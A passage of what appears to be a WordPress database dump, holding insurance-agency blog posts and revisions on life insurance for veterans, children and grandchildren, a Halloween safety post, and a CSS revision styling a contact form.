insurance proceeds early if they have a life expectancy of nine months or less.<sup>2</sup>\r\n<h3>Private Sector</h3>\r\nIf public life insurance isn’t fit for your situation as a US veteran or family member of a US veteran, there are other life insurance options available—namely in the private sector.\r\n\r\nThere are a number of ways to convert from the public, military provided life insurance to private life insurance, but one of the most common methods involves switching from SGLI to private health insurance immediately after SGLI expires (120 days after service has ended).<sup>2</sup>\r\n\r\nTo prevent any gaps in coverage, it’s vital that those looking to transition to private life insurance start any applications needed as soon as possible.\r\n\r\nAnother option veterans have is to transition from SGLI to VGLI, allowing veterans and their families time to explore, consider, and settle on a private life insurance policy without risking gaps in coverage.<sup>2</sup>\r\n\r\nHowever, like public life insurance, private life insurance comes in a number of different shapes and sizes. For this reason, it is recommended that veterans considering a private life insurance policy explore the different types of private life insurance options available, like term and whole life insurance.\r\n<h4>Term Life Insurance</h4>\r\nTerm life insurance provides the insured with a predetermined death benefit and covers the insured for a set number of years.<sup>3</sup> The number of years in which the insured is under the policy is called a “term.”\r\n\r\nAfter the term of the policy, the insured will have to decide whether to renew their term life policy for another term. Annual premiums are typically offered at a fixed rate, and the death benefit only pays out if the insured dies during the designated term period.\r\n\r\nTerm life insurance is often the least expensive of life insurance available.<sup>3</sup>\r\n<h4>Permanent Life Insurance</h4>\r\nPermanent life insurance provides the insured with a death benefit as well as a cash value component.<sup>3</sup> In other words, the premiums the insured pays go towards the policy while acquiring cash value, which the insured can then access to help supplement their income or make payments while they’re still alive.<sup>3</sup>\r\n\r\nPermanent life insurance is designed to cover the insured for as long as they are alive, meaning that the insured doesn’t have to worry about their policy expiring at the end of a term or needing to renew.\r\n\r\nIn closing, there are a number of different options veterans can pursue when considering a life insurance policy.\r\n\r\nHowever, what they ultimately decide should be based on what’s best for them and their own financial well-being. We suggest consulting a financial advisor to help advise you during your decision making process.\r\n\r\n<em><span style=\"font-size: 8pt;\">Sources:\r\n</span></em><em><span style=\"font-size: 8pt;\">1. U.S. Department of Veterans Affairs, Life Insurance, 2019, <a href=\"https://www.benefits.va.gov/insurance/\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.benefits.va.gov/insurance/</a>\r\n</span></em><em><span style=\"font-size: 8pt;\">2. Investopedia, Life Insurance for Veterans, 2019, <a href=\"https://www.policygenius.com/life-insurance/life-insurance-for-veterans/\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.policygenius.com/life-insurance/life-insurance-for-veterans/</a>\r\n</span></em><em><span style=\"font-size: 8pt;\">3. Investopedia, The Best Type of Life Insurance For You Right Now, 2019, <a href=\"https://www.investopedia.com/financial-edge/0312/the-best-type-of-life-insurance-for-you-right-now.aspx\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.investopedia.com/financial-edge/0312/the-best-type-of-life-insurance-for-you-right-now.aspx</a></span></em>','Beyond Active Duty: Life Insurance Options For US Veterans','','inherit','closed','closed','','306-revision-v1','','','2023-03-14 13:19:05','2023-03-14 13:19:05','',306,'http://cmdev-site1.com/?p=308',0,'revision','',0),(311,3,'2023-03-14 13:29:03','2023-03-14 13:29:03','<span style=\"font-size: 8pt;\">By Mike Elman</span>\r\n\r\nA lot of parents wonder if purchasing life insurance for their children is the right financial decision. However, with valid concerns for both sides of the argument, it can be hard to determine if purchasing life insurance for your child is the right decision.\r\n\r\nThis blog will cover everything you need to know about life insurance on children while presenting you the pros and cons of such an investment with insight from an array of experts.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>How Life Insurance on Children Works</h3>\r\nLife insurance on children is often marketed to parents and grandparents as a way to save for the child’s financial future while protecting the child’s insurability. While there are an array of child life insurance options available, most child life insurance policies are offered in the form of whole life, a type of permanent life insurance that includes a cash value component.<sup>1</sup>\r\n\r\nWhole life insurance policies that include a cash value component can be used to pay for a variety of things, including but not limited to college education, a car or housing down payment, medical bills, and more.\r\n\r\nSome argue that one of the most compelling features of child life insurance comes in the form of its cash value component, which is tax-deferred—meaning that it isn’t taxed as income until you withdraw money from the policy or surrender the policy entirely.<sup>1</sup>\r\n\r\nThat, and the slow but steady growth of cash value over time, can make child life insurance an alluring option for parents and grandparents looking to ensure the child protected is in the best possible financial position for the future.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>The Pros and Cons</h3>\r\nAs mentioned, there are great points to consider for buying or not buying a life insurance policy for your child. But with so many conflicting opinions on the matter, it can be difficult to navigate.\r\n\r\nBelow, you’ll find a list of commonly associated pros and cons of child life insurance to help you make the best decision for your family.\r\n<ul>\r\n 	<li><strong>Pro:</strong> There are a number of factors that can impact your child’s future insurability, including high blood pressure, diabetes, and obesity, to name a few.<sup>2</sup> With this in mind, a child who develops any health issue early on in life may have trouble qualifying for life insurance coverage in the future, as they could be considered a higher risk.<sup>2</sup> By purchasing child life insurance coverage early, you can help ensure your child has coverage now and well into their adult life—regardless of any medical issues that may develop along the way.</li>\r\n 	<li><strong>Con:</strong> The chances of a child developing a health issue so early on in life are rare. So, investing in a child life insurance policy can be an expensive investment for such a minute risk.</li>\r\n 	<li><strong>Pro:</strong> Small policies can be affordable, with costs ranging from $5 to $15 a month.<sup>2</sup> While the death of a child is rare, being covered in the case of tragedy can help provide you with financial security in the worst possible situation imaginable.</li>\r\n 	<li><strong>Con:</strong> Statistically, the odds of a child dying are very slim. Some experts suggest stashing money into an emergency fund instead of investing in a child life policy, which would allow for the funds to be used in case of any crisis—not just the death of a child.<sup>1</sup></li>\r\n 	<li><strong>Pro:</strong> You can use the cash value your policy accrues to help your child pay for an array of costs, including college expenses, a car payment, or something else down the line.<sup>2</sup></li>\r\n 	<li><strong>Con:</strong> Some argue that there are better ways to save for your child’s financial future than with a child\'s life insurance policy. In fact, Carrie Houchins-Witt, a financial advisor in Iowa, states, “There are a multitude of opportunities to make a better return than through investing in life insurance.”<sup>1\r\n<span style=\"color: #ffffff;\">-</span></sup></li>\r\n</ul>\r\n<h3>To Summarize</h3>\r\nAs you can see, there are a number of arguments for and against child life insurance. However, expert opinions and blog postings aside, you know what path provides the best opportunity for you and your family.\r\n\r\nMake sure to take your unique situation into account and consult with your local insurance agent or financial advisor before proceeding with a child life insurance policy purchase.\r\n\r\nFor more information about life insurance, contact one of our knowledgeable agents at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713.254.3439</a> or email us at <a href=\"mailto:info@jsuttonfinancial.com\" target=\"_blank\" rel=\"noopener\">info@jsuttonfinancial.com</a>.\r\n\r\n<em><span style=\"font-size: 8pt;\">Sources:\r\n</span></em><em><span style=\"font-size: 8pt;\">1. Nerdwallet, Life Insurance for Children: The Cases for and Against, 2018, <a href=\"https://www.nerdwallet.com/blog/insurance/debate-over-life-insurance-for-children/\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.nerdwallet.com/blog/insurance/debate-over-life-insurance-for-children/</a>\r\n</span></em><em><span style=\"font-size: 8pt;\">2. The Balance, Top 5 Reasons to Buy Life Insurance for Your Children, 2019, <a href=\"https://www.thebalance.com/consider-buying-life-insurance-for-children-3129226\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.thebalance.com/consider-buying-life-insurance-for-children-3129226</a></span></em>','Life Insurance On Children: What You Need To Know','','publish','open','open','','life-insurance-on-children-what-you-need-to-know','','','2023-03-19 17:47:44','2023-03-19 17:47:44','',0,'http://cmdev-site1.com/?p=311',0,'post','',0),(313,3,'2023-03-14 13:28:02','2023-03-14 13:28:02','<span style=\"font-size: 8pt;\">By Mike Elman</span>\r\n\r\nA lot of parents wonder if purchasing life insurance for their children is the right financial decision. However, with valid concerns for both sides of the argument, it can be hard to determine if purchasing life insurance for your child is the right decision.\r\n\r\nThis blog will cover everything you need to know about life insurance on children while presenting you the pros and cons of such an investment with insight from an array of experts.\r\n-\r\n<h3>How Life Insurance on Children Works</h3>\r\nLife insurance on children is often marketed to parents and grandparents as a way to save for the child’s financial future while protecting the child’s insurability. While there are an array of child life insurance options available, most child life insurance policies are offered in the form of whole life, a type of permanent life insurance that includes a cash value component.<sup>1</sup>\r\n\r\nWhole life insurance policies that include a cash value component can be used to pay for a variety of things, including but not limited to college education, a car or housing down payment, medical bills, and more.\r\n\r\nSome argue that one of the most compelling features of child life insurance comes in the form of its cash value component, which is tax-deferred—meaning that it isn’t taxed as income until you withdraw money from the policy or surrender the policy entirely.<sup>1</sup>\r\n\r\nThat, and the slow but steady growth of cash value over time, can make child life insurance an alluring option for parents and grandparents looking to ensure the child protected is in the best possible financial position for the future.\r\n-\r\n<h3>The Pros and Cons</h3>\r\nAs mentioned, there are great points to consider for buying or not buying a life insurance policy for your child. But with so many conflicting opinions on the matter, it can be difficult to navigate.\r\n\r\nBelow, you’ll find a list of commonly associated pros and cons of child life insurance to help you make the best decision for your family.\r\n<ul>\r\n 	<li><strong>Pro:</strong> There are a number of factors that can impact your child’s future insurability, including high blood pressure, diabetes, and obesity, to name a few.<sup>2</sup> With this in mind, a child who develops any health issue early on in life may have trouble qualifying for life insurance coverage in the future, as they could be considered a higher risk.<sup>2</sup> By purchasing child life insurance coverage early, you can help ensure your child has coverage now and well into their adult life—regardless of any medical issues that may develop along the way.</li>\r\n 	<li><strong>Con:</strong> The chances of a child developing a health issue so early on in life are rare. So, investing in a child life insurance policy can be an expensive investment for such a minute risk.</li>\r\n 	<li><strong>Pro:</strong> Small policies can be affordable, with costs ranging from $5 to $15 a month.<sup>2</sup> While the death of a child is rare, being covered in the case of tragedy can help provide you with financial security in the worst possible situation imaginable.</li>\r\n 	<li><strong>Con:</strong> Statistically, the odds of a child dying are very slim. Some experts suggest stashing money into an emergency fund instead of investing in a child life policy, which would allow for the funds to be used in case of any crisis—not just the death of a child.<sup>1</sup></li>\r\n 	<li><strong>Pro:</strong> You can use the cash value your policy accrues to help your child pay for an array of costs, including college expenses, a car payment, or something else down the line.<sup>2</sup></li>\r\n 	<li><strong>Con:</strong> Some argue that there are better ways to save for your child’s financial future than with a child\'s life insurance policy. In fact, Carrie Houchins-Witt, a financial advisor in Iowa, states, “There are a multitude of opportunities to make a better return than through investing in life insurance.”<sup>1\r\n-</sup></li>\r\n</ul>\r\n<h3>To Summarize</h3>\r\nAs you can see, there are a number of arguments for and against child life insurance. However, expert opinions and blog postings aside, you know what path provides the best opportunity for you and your family.\r\n\r\nMake sure to take your unique situation into account and consult with your local insurance agent or financial advisor before proceeding with a child life insurance policy purchase.\r\n\r\n<em><span style=\"font-size: 8pt;\">Sources:\r\n</span></em><em><span style=\"font-size: 8pt;\">1. Nerdwallet, Life Insurance for Children: The Cases for and Against, 2018, <a href=\"https://www.nerdwallet.com/blog/insurance/debate-over-life-insurance-for-children/\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.nerdwallet.com/blog/insurance/debate-over-life-insurance-for-children/</a>\r\n</span></em><em><span style=\"font-size: 8pt;\">2. The Balance, Top 5 Reasons to Buy Life Insurance for Your Children, 2019, <a href=\"https://www.thebalance.com/consider-buying-life-insurance-for-children-3129226\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.thebalance.com/consider-buying-life-insurance-for-children-3129226</a></span></em>','Life Insurance On Children: What You Need To Know','','inherit','closed','closed','','311-revision-v1','','','2023-03-14 13:28:02','2023-03-14 13:28:02','',311,'http://cmdev-site1.com/?p=313',0,'revision','',0),(314,3,'2023-03-14 13:28:51','2023-03-14 13:28:51','<span style=\"font-size: 8pt;\">By Mike Elman</span>\r\n\r\nA lot of parents wonder if purchasing life insurance for their children is the right financial decision. However, with valid concerns for both sides of the argument, it can be hard to determine if purchasing life insurance for your child is the right decision.\r\n\r\nThis blog will cover everything you need to know about life insurance on children while presenting you the pros and cons of such an investment with insight from an array of experts.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>How Life Insurance on Children Works</h3>\r\nLife insurance on children is often marketed to parents and grandparents as a way to save for the child’s financial future while protecting the child’s insurability. While there are an array of child life insurance options available, most child life insurance policies are offered in the form of whole life, a type of permanent life insurance that includes a cash value component.<sup>1</sup>\r\n\r\nWhole life insurance policies that include a cash value component can be used to pay for a variety of things, including but not limited to college education, a car or housing down payment, medical bills, and more.\r\n\r\nSome argue that one of the most compelling features of child life insurance comes in the form of its cash value component, which is tax-deferred—meaning that it isn’t taxed as income until you withdraw money from the policy or surrender the policy entirely.<sup>1</sup>\r\n\r\nThat, and the slow but steady growth of cash value over time, can make child life insurance an alluring option for parents and grandparents looking to ensure the child protected is in the best possible financial position for the future.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>The Pros and Cons</h3>\r\nAs mentioned, there are great points to consider for buying or not buying a life insurance policy for your child. But with so many conflicting opinions on the matter, it can be difficult to navigate.\r\n\r\nBelow, you’ll find a list of commonly associated pros and cons of child life insurance to help you make the best decision for your family.\r\n<ul>\r\n 	<li><strong>Pro:</strong> There are a number of factors that can impact your child’s future insurability, including high blood pressure, diabetes, and obesity, to name a few.<sup>2</sup> With this in mind, a child who develops any health issue early on in life may have trouble qualifying for life insurance coverage in the future, as they could be considered a higher risk.<sup>2</sup> By purchasing child life insurance coverage early, you can help ensure your child has coverage now and well into their adult life—regardless of any medical issues that may develop along the way.</li>\r\n 	<li><strong>Con:</strong> The chances of a child developing a health issue so early on in life are rare. So, investing in a child life insurance policy can be an expensive investment for such a minute risk.</li>\r\n 	<li><strong>Pro:</strong> Small policies can be affordable, with costs ranging from $5 to $15 a month.<sup>2</sup> While the death of a child is rare, being covered in the case of tragedy can help provide you with financial security in the worst possible situation imaginable.</li>\r\n 	<li><strong>Con:</strong> Statistically, the odds of a child dying are very slim. Some experts suggest stashing money into an emergency fund instead of investing in a child life policy, which would allow for the funds to be used in case of any crisis—not just the death of a child.<sup>1</sup></li>\r\n 	<li><strong>Pro:</strong> You can use the cash value your policy accrues to help your child pay for an array of costs, including college expenses, a car payment, or something else down the line.<sup>2</sup></li>\r\n 	<li><strong>Con:</strong> Some argue that there are better ways to save for your child’s financial future than with a child\'s life insurance policy. In fact, Carrie Houchins-Witt, a financial advisor in Iowa, states, “There are a multitude of opportunities to make a better return than through investing in life insurance.”<sup>1\r\n<span style=\"color: #ffffff;\">-</span></sup></li>\r\n</ul>\r\n<h3>To Summarize</h3>\r\nAs you can see, there are a number of arguments for and against child life insurance. However, expert opinions and blog postings aside, you know what path provides the best opportunity for you and your family.\r\n\r\nMake sure to take your unique situation into account and consult with your local insurance agent or financial advisor before proceeding with a child life insurance policy purchase.\r\n\r\n<em><span style=\"font-size: 8pt;\">Sources:\r\n</span></em><em><span style=\"font-size: 8pt;\">1. Nerdwallet, Life Insurance for Children: The Cases for and Against, 2018, <a href=\"https://www.nerdwallet.com/blog/insurance/debate-over-life-insurance-for-children/\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.nerdwallet.com/blog/insurance/debate-over-life-insurance-for-children/</a>\r\n</span></em><em><span style=\"font-size: 8pt;\">2. The Balance, Top 5 Reasons to Buy Life Insurance for Your Children, 2019, <a href=\"https://www.thebalance.com/consider-buying-life-insurance-for-children-3129226\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.thebalance.com/consider-buying-life-insurance-for-children-3129226</a></span></em>','Life Insurance On Children: What You Need To Know','','inherit','closed','closed','','311-revision-v1','','','2023-03-14 13:28:51','2023-03-14 13:28:51','',311,'http://cmdev-site1.com/?p=314',0,'revision','',0),(315,3,'2023-03-14 13:34:59','2023-03-14 13:34:59','<span style=\"font-size: 8pt;\">By Lucille Reed</span>\r\n\r\nHalloween is a time for costumes, treats, and make-believe scares. In preparation for the fun, however, very real safety concerns should be addressed. One of the biggest concerns during Halloween is pedestrian safety.\r\n\r\nTrick-or-treating is a lot of fun, but there are some frightening statistics when safety measures aren’t taken. According to the National Safety Council:\r\n<blockquote><em>Children are more than twice as likely to be hit by a car and killed on Halloween than on any other day of the year, and October ranks No. 2 in motor vehicle deaths by month.</em></blockquote>\r\nTo help your loved ones stay safe during the spooky season, we’ve compiled some helpful “tricks” below:\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h4>Trick-Or-Treat Tips</h4>\r\n<ol>\r\n 	<li>Younger kids (under age 12) should have a dependable adult with them.</li>\r\n 	<li>Only trick-or-treat in well-lit, well-known areas (like your street and/or neighborhood).</li>\r\n 	<li>NEVER enter a stranger’s home or car.</li>\r\n 	<li>Do not cross into the street except at designated crosswalks, and NEVER run.</li>\r\n 	<li>Put away electronic devices (adults and kids) and keep heads up.</li>\r\n 	<li>Drivers: pay special attention for children walking and especially those in darker clothing.</li>\r\n 	<li>A grown-up should inspect all treats before consumption for loose or torn wrappers, choking hazards, etc. When in doubt, throw it out!\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n</ol>\r\n<h4>Ghoulish Gear</h4>\r\n<ol>\r\n 	<li>Make sure costumes purchased or made are flame-resistant.</li>\r\n 	<li>Size is important. Avoid longer costumes and oversized shoes or heels to avoid tripping. Also, make sure the costume is roomy enough to compensate for layers if the night is cool.</li>\r\n 	<li>Especially during twilight and later hours, dark colors are hard to see. Opt for bright hues or add reflective tape or glow sticks to be more visible.</li>\r\n 	<li>Masks are scary and fun, but make it hard for YOU to see. Choose non-toxic makeup instead (but make sure to test it on a small area of skin first). The FDA has a list of approved color additives for cosmetic use (found <a href=\"https://www.fda.gov/Cosmetics/Labeling/IngredientNames/ucm109084.htm\" target=\"_blank\" rel=\"noopener noreferrer\">here</a>). If the colors are not included on the FDA list, avoid using that makeup.</li>\r\n 	<li>Without an actual prescription from an eye care professional, avoid colored contact lenses.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n</ol>\r\n<h4>Proper Pumpkin Procedures</h4>\r\n<ol>\r\n 	<li>Any carving should be done by a responsible adult.</li>\r\n 	<li>Smaller children should decorate pumpkins with paint, markers, or other craft items.</li>\r\n 	<li>Use flashlights, glow sticks, or battery-operated lights, as opposed to candles, to prevent a fire hazard.</li>\r\n 	<li>If using candles, make sure the pumpkin is on a sturdy, flat surface away from flammable objects such as curtains or other materials.</li>\r\n</ol>\r\nFor more information about life insurance, contact one of our knowledgeable agents at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713.254.3439</a> or email us at <a href=\"mailto:info@jsuttonfinancial.com\" target=\"_blank\" rel=\"noopener\">info@jsuttonfinancial.com</a>.\r\n\r\n<em><span style=\"font-size: 8pt;\">Sources:\r\n</span></em><em><span style=\"font-size: 8pt;\">National Safety Council </span></em><em><span style=\"font-size: 8pt;\"><a href=\"https://www.nsc.org/home-safety/tools-resources/seasonal-safety/autumn/halloween\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.nsc.org/home-safety/tools-resources/seasonal-safety/autumn/halloween</a>\r\n</span></em><em><span style=\"font-size: 8pt;\">US Food &amp; Drug Administration </span></em><em><span style=\"font-size: 8pt;\"><a href=\"https://www.fda.gov/ForConsumers/ConsumerUpdates/ucm230283.htm\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.fda.gov/ForConsumers/ConsumerUpdates/ucm230283.htm</a>\r\n</span></em><em><span style=\"font-size: 8pt;\">Mayo Clinic </span></em><em><span style=\"font-size: 8pt;\"><a href=\"https://www.mayoclinic.org/healthy-lifestyle/childrens-health/in-depth/halloween-safety/art-20044976\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.mayoclinic.org/healthy-lifestyle/childrens-health/in-depth/halloween-safety/art-20044976</a></span></em>\r\n\r\n&nbsp;','Halloween Safety Every Parent Should Know','','publish','open','open','','halloween-safety-every-parent-should-know','','','2023-03-19 17:48:14','2023-03-19 17:48:14','',0,'http://cmdev-site1.com/?p=315',0,'post','',0),(316,1,'2023-03-14 13:32:07','2023-03-14 13:32:07','.gform_wrapper.tc_wrapper {\r\n    width: 800px;\r\n    margin: 0 auto;\r\n    background: #fff;\r\n    padding: 30px;\r\n    border: 1px solid rgba(0,0,0,.1);\r\n    border-radius: 8px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gform_heading {\r\n    display: none;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper h3 {\r\n    padding: 0;\r\n    font-weight: 700;\r\n    text-align: center;\r\n    color: #000;\r\n    font-size: 26px;\r\n    margin-bottom: 30px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.two_box {\r\n    display: grid;\r\n    grid-template-columns: 5fr 7fr;\r\n    column-gap: 40px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.two_box .gfield_description {\r\n    padding: 0;\r\n    font-size: 13px;\r\n    color: #000;\r\n    line-height: 18px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.two_box .gfield_label, .gform_wrapper.tc_wrapper .gfield.two_box .validation_message {\r\n    grid-column: 1/-1;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper input[type=text], .gform_wrapper.tc_wrapper input[type=email], .gform_wrapper.tc_wrapper input[type=tel], .gform_wrapper.tc_wrapper input[type=number] {\r\n    border: 1px solid #999;\r\n    outline: none;\r\n    border-radius: 5px;\r\n    padding: 12px 15px;\r\n    font-size: 15px !important;\r\n    transition: 0.3s;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper input[type=text]:focus, .gform_wrapper.tc_wrapper input[type=email]:focus, .gform_wrapper.tc_wrapper input[type=tel]:focus, .gform_wrapper.tc_wrapper input[type=number]:focus {\r\n    border-color: #333;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper input[type=number]::-webkit-outer-spin-button, .gform_wrapper.tc_wrapper input[type=number]::-webkit-inner-spin-button {\r\n    -webkit-appearance: none;\r\n    -moz-appearance: textfield;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield .gfield_label {\r\n    font-weight: 600;\r\n    color: #000;\r\n    font-size: 14px;\r\n    margin: 0;\r\n    max-width: 40%;\r\n    line-height: 18px;\r\n    margin-bottom: 5px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.btn_box .gfield_radio .gchoice input[type=radio] {\r\n    display: none;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.btn_box .gfield_radio {\r\n    display: grid;\r\n    grid-template-columns: 1fr 1fr;\r\n    gap: 16px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.btn_box .gfield_radio label {\r\n    width: 100%;\r\n    max-width: 100%;\r\n    border: 1px solid #666;\r\n    text-align: center;\r\n    color: #333;\r\n    padding: 10px;\r\n    border-radius: 5px;\r\n    cursor: pointer;\r\n    transition: 0.3s;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.btn_box .gfield_radio input:checked + label {\r\n    background: #e3e1e1;\r\n    color: #000;\r\n    border-color: #000;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gform_footer.top_label {\r\n    padding: 0;\r\n    margin: 40px 0 0 0;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gform_footer.top_label input[type=submit] {\r\n    margin: 0;\r\n    padding: 12px 50px;\r\n    border: 1px solid #000;\r\n    background: #000;\r\n    border-radius: 5px;\r\n    color: #fff;\r\n    font-size: 16px;\r\n    text-transform: uppercase;\r\n    font-weight: 600;\r\n    transition: 0.3s;\r\n    cursor: pointer;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gform_footer.top_label input[type=submit]:hover {\r\n    background: #333;\r\n}\r\n\r\n\r\n.gform_wrapper.tc_wrapper .gform_validation_errors {\r\n    display: none;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield_error .validation_message {\r\n    border: none;\r\n    background: transparent;\r\n    color: #C02B0A !important;\r\n    margin-top: 5px;\r\n    padding: 0;\r\n    font-size: 14px;\r\n}\r\np.qut {\r\n    font-size: 24px;\r\n    color: #000;\r\n}\r\n@media only screen and (max-width: 767px) { \r\n	\r\n.gform_wrapper.tc_wrapper {\r\n    width: 100%;\r\n    padding: 18px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper h3 {\r\n    font-size: 18px;\r\n    margin-bottom: 20px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.two_box {\r\n    grid-template-columns: 1fr;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.two_box .gfield_description {\r\n    margin-top: 15px;\r\n}\r\n.gform_wrapper.tc_wrapper input[type=text], .gform_wrapper.tc_wrapper input[type=email], .gform_wrapper.tc_wrapper input[type=tel], .gform_wrapper.tc_wrapper input[type=number] {\r\n    padding: 6px 15px;\r\n}\r\n.gform_wrapper.tc_wrapper .gfield .gfield_label {\r\n    max-width: 100%;\r\n}	\r\n}','Divi','','inherit','closed','closed','','35-revision-v1','','','2023-03-14 13:32:07','2023-03-14 13:32:07','',35,'http://cmdev-site1.com/?p=316',0,'revision','',0),(317,3,'2023-03-14 13:34:32','2023-03-14 13:34:32','<span style=\"font-size: 8pt;\">By Lucille Reed</span>\r\n\r\nHalloween is a time for costumes, treats, and make-believe scares. In preparation for the fun, however, very real safety concerns should be addressed. One of the biggest concerns during Halloween is pedestrian safety.\r\n\r\nTrick-or-treating is a lot of fun, but there are some frightening statistics when safety measures aren’t taken. According to the National Safety Council:\r\n<blockquote><em>Children are more than twice as likely to be hit by a car and killed on Halloween than on any other day of the year, and October ranks No. 2 in motor vehicle deaths by month.</em></blockquote>\r\nTo help your loved ones stay safe during the spooky season, we’ve compiled some helpful “tricks” below:\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h4>Trick-Or-Treat Tips</h4>\r\n<ol>\r\n 	<li>Younger kids (under age 12) should have a dependable adult with them.</li>\r\n 	<li>Only trick-or-treat in well-lit, well-known areas (like your street and/or neighborhood).</li>\r\n 	<li>NEVER enter a stranger’s home or car.</li>\r\n 	<li>Do not cross into the street except at designated crosswalks, and NEVER run.</li>\r\n 	<li>Put away electronic devices (adults and kids) and keep heads up.</li>\r\n 	<li>Drivers: pay special attention for children walking and especially those in darker clothing.</li>\r\n 	<li>A grown-up should inspect all treats before consumption for loose or torn wrappers, choking hazards, etc. When in doubt, throw it out!\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n</ol>\r\n<h4>Ghoulish Gear</h4>\r\n<ol>\r\n 	<li>Make sure costumes purchased or made are flame-resistant.</li>\r\n 	<li>Size is important. Avoid longer costumes and oversized shoes or heels to avoid tripping. Also, make sure the costume is roomy enough to compensate for layers if the night is cool.</li>\r\n 	<li>Especially during twilight and later hours, dark colors are hard to see. Opt for bright hues or add reflective tape or glow sticks to be more visible.</li>\r\n 	<li>Masks are scary and fun, but make it hard for YOU to see. Choose non-toxic makeup instead (but make sure to test it on a small area of skin first). The FDA has a list of approved color additives for cosmetic use (found <a href=\"https://www.fda.gov/Cosmetics/Labeling/IngredientNames/ucm109084.htm\" target=\"_blank\" rel=\"noopener noreferrer\">here</a>). If the colors are not included on the FDA list, avoid using that makeup.</li>\r\n 	<li>Without an actual prescription from an eye care professional, avoid colored contact lenses.\r\n<span style=\"color: #ffffff;\">-</span></li>\r\n</ol>\r\n<h4>Proper Pumpkin Procedures</h4>\r\n<ol>\r\n 	<li>Any carving should be done by a responsible adult.</li>\r\n 	<li>Smaller children should decorate pumpkins with paint, markers, or other craft items.</li>\r\n 	<li>Use flashlights, glow sticks, or battery-operated lights, as opposed to candles, to prevent a fire hazard.</li>\r\n 	<li>If using candles, make sure the pumpkin is on a sturdy, flat surface away from flammable objects such as curtains or other material.</li>\r\n</ol>\r\n<em><span style=\"font-size: 8pt;\">Sources:\r\n</span></em><em><span style=\"font-size: 8pt;\">National Safety Council </span></em><em><span style=\"font-size: 8pt;\"><a href=\"https://www.nsc.org/home-safety/tools-resources/seasonal-safety/autumn/halloween\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.nsc.org/home-safety/tools-resources/seasonal-safety/autumn/halloween</a>\r\n</span></em><em><span style=\"font-size: 8pt;\">US Food &amp; Drug Administration </span></em><em><span style=\"font-size: 8pt;\"><a href=\"https://www.fda.gov/ForConsumers/ConsumerUpdates/ucm230283.htm\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.fda.gov/ForConsumers/ConsumerUpdates/ucm230283.htm</a>\r\n</span></em><em><span style=\"font-size: 8pt;\">Mayo Clinic </span></em><em><span style=\"font-size: 8pt;\"><a href=\"https://www.mayoclinic.org/healthy-lifestyle/childrens-health/in-depth/halloween-safety/art-20044976\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.mayoclinic.org/healthy-lifestyle/childrens-health/in-depth/halloween-safety/art-20044976</a></span></em>\r\n\r\n&nbsp;','Halloween Safety Every Parent Should Know','','inherit','closed','closed','','315-revision-v1','','','2023-03-14 13:34:32','2023-03-14 13:34:32','',315,'http://cmdev-site1.com/?p=317',0,'revision','',0),(318,3,'2023-03-14 13:40:48','2023-03-14 13:40:48','<span style=\"font-size: 8pt;\">By Mike Elman</span>\r\n\r\nBeing a grandparent is a rewarding gift, and you likely love your grandchildren as much as your own children. You may even take the same responsibilities—to ensure their future is safe and opportunistic.\r\n\r\nWith that being said, many grandparents look into life insurance, as it can provide financial protection and a legacy for their grandchildren. However, with any insurance, there comes a lot of consideration and sorting through the options.\r\n\r\nIf you’re on the fence about purchasing life insurance for your grandchildren, we’ve listed the pros and cons to help you weigh all the benefits and disadvantages.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h3>Pros of Buying Life Insurance for Your Grandchildren</h3>\r\n<ul>\r\n 	<li><strong>High value at a low cost</strong>\r\nThe perk of buying life insurance when your grandchild is young is the value of the policy. Because young children are normally healthy and have a long future, they’re easier to insure, and premiums are typically lower. We lose insurability as we age; therefore, you could get a decent amount of coverage for less than your grandchild would pay if he or she buys coverage at an older age, such as their early 30s.</li>\r\n 	<li><strong>Steady growth in cash value</strong>\r\nIf you decide to purchase a whole life insurance policy, they typically offer cash value which accumulates for the life of the policy. This cash value could come in handy later on in your grandchild’s life should they need to use it for college or a down payment on a home.</li>\r\n 	<li><strong>Leaving a legacy</strong>\r\nDue to the hardships this generation’s 